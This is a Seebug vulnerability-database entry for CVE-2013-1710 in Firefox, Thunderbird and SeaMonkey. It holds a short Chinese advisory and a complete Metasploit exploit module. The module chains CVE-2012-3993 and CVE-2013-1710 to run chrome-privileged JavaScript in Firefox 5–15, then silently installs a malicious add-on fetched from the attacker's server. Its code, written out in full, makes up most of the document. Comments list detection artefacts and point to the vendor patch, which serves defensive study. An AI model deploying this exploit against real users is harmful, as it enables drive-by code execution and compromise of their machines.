seebugRootSSV:61208

Mozilla Firefox/SeaMonkey/Thunderbird CRMF请求生成跨站脚本漏洞

2013-12-25 00:00:00
Root
www.seebug.org

0.927 High

EPSS

Percentile

99.0%

BUGTRAQ ID:61641
CVE ID:CVE-2013-1710

Mozilla Firefox/SeaMonkey/Thunderbird是Mozilla所发布的WEB浏览器/新闻组客户端/邮件客户端。

Mozilla Firefox/SeaMonkey/Thunderbird crypto.generateCRMFRequest函数存在安全漏洞,允许远程攻击者在某些情况下生成证书请求消息格式(Certificate Request Message Format)请求来执行任意Javascript代码或进行跨站脚本攻击。
Mozilla Firefox < 23.0
mozilla Firefox ESR 17.x
mozilla Thunderbird < 17.0.8
mozilla Thunderbird ESR 17.x
mozilla SeaMonkey < 2.20
厂商补丁:

Mozilla

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org


                                                ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
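# Browser exploit server module for Firefox 5.0 - 15.0.1.
#
# The served page chains two historical Firefox bugs: CVE-2012-3993 (an exception
# thrown by InstallTrigger whose prototype lacks __exposedProps__, fixed before
# Firefox 16 per the 'BrowserRequirements' version filter below) and CVE-2013-1710
# (crypto.generateCRMFRequest, fixed in Firefox 23 / Thunderbird 17.0.8 /
# SeaMonkey 2.20). The end result is a silent add-on install through the
# AddonManager API; the add-on itself comes from FirefoxAddonGenerator.
#
# Observable artefacts for detection: an HTML page whose script touches
# InstallTrigger, __exposedProps__ and generateCRMFRequest, followed by a
# request for '<module uri>/addon.xpi' answered with
# 'Content-Type: application/x-xpinstall'. Mitigation is the vendor upgrade;
# the affected browser versions are out of support.
#
# NOTE: the listing on this page was HTML-entity encoded (&lt; &gt; &quot;); the
# entities are decoded here so the module is syntactically valid Ruby.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  # Registers module metadata and the single CONTENT option.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
      'Description'    => %q{
        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
        invalid input, would throw an exception that did not have an __exposedProps__
        property set. By re-setting this property on the exception object's prototype,
        the chrome-based defineProperty method is made available.

        With the defineProperty method, functions belonging to window and document can be
        overriden with a function that gets called from chrome-privileged context. From here,
        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
        into the context's private scope. Since the window does not have a chrome:// URL,
        the insecure parts of Components.classes are not available, so instead the AddonManager
        API is invoked to silently install a malicious plugin.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'Mariusz Mlynski', # discovered CVE-2012-3993
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'joev' # metasploit module
      ],
      'DisclosureDate' => "Aug 6 2013",
      'References' => [
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
        ['OSVDB', '86111'],
        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
        ['OSVDB', '96019']
      ],
      # Only Firefox major versions 5..15 are served: CVE-2013-1710 alone reaches
      # Firefox 22, but the __exposedProps__ primitive is needed first.
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
      }
    ))

    # CONTENT is interpolated verbatim (unescaped) into the served <body>; it is
    # operator-supplied, not untrusted input.
    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
    ], self.class)
  end

  # Handles one browser request: a URI ending in '.xpi' gets the generated add-on,
  # anything else gets the exploit page.
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] incoming request
  # @param target_info [Hash] browser fingerprint gathered by BrowserExploitServer
  def on_request_exploit(cli, request, target_info)
    if request.uri.match(/\.xpi$/i)
      print_status("Sending the malicious addon")
      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
    else
      print_status("Sending HTML")
      send_response_html(cli, generate_html(target_info))
    end
  end

  # Builds the exploit page for the fingerprinted browser.
  #
  # Firefox 15 takes the __defineGetter__ path; older versions use defineProperty
  # reached through the exception prototype chain. The getter installed on every
  # window/document property runs once (guarded by `q`) and passes the hidden
  # #payload element's text to generateCRMFRequest, which evaluates it with the
  # caller's privileges and triggers the AddonManager install.
  #
  # @param target_info [Hash] browser fingerprint; only :ua_ver is read
  # @return [String] the HTML document
  def generate_html(target_info)
    injection = if target_info[:ua_ver].to_i == 15
      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
    else
      "p2.constructor.defineProperty(obj,key,{get:runme});"
    end

    %Q|
      <html>
      <body>
      #{datastore['CONTENT']}
      <div id='payload' style='display:none'>
      if (!window.done){
        window.AddonManager.getInstallForURL(
          '#{get_module_uri}/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
      </div>
      <script>
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
        };
        try {
          #{injection}
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
      </script>
      </body>
      </html>
    |
  end
end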